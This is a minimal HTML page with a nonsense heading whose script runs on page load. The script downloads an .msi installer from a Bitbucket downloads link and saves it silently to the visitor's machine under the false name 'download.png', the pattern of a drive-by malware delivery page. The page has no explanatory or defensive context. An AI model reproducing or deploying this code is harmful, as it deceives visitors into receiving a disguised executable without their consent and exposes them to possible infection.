<html>
<head>
</head>
<body style="margin:0;padding:0;">
<h1>egftrewrtwer</h1>
<!--https://bitbucket.org/ivanivanovich234/firstproject/downloads/installers.msi-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
	$.ajax({
		url: 'https://bitbucket.org/ivanivanovich234/firstproject/downloads/installers.msi',
		dataType: 'binary',
		xhrFields: {
			'responseType': 'blob'
		},
		success: function(data, status, xhr) {
			var blob = new Blob([data], {type: xhr.getResponseHeader('Content-Type')});
			var link = document.createElement('a');
			link.href = window.URL.createObjectURL(blob);
			link.download = 'download.png';
			link.click();
		}
	});
});
</script>

</body>
</html>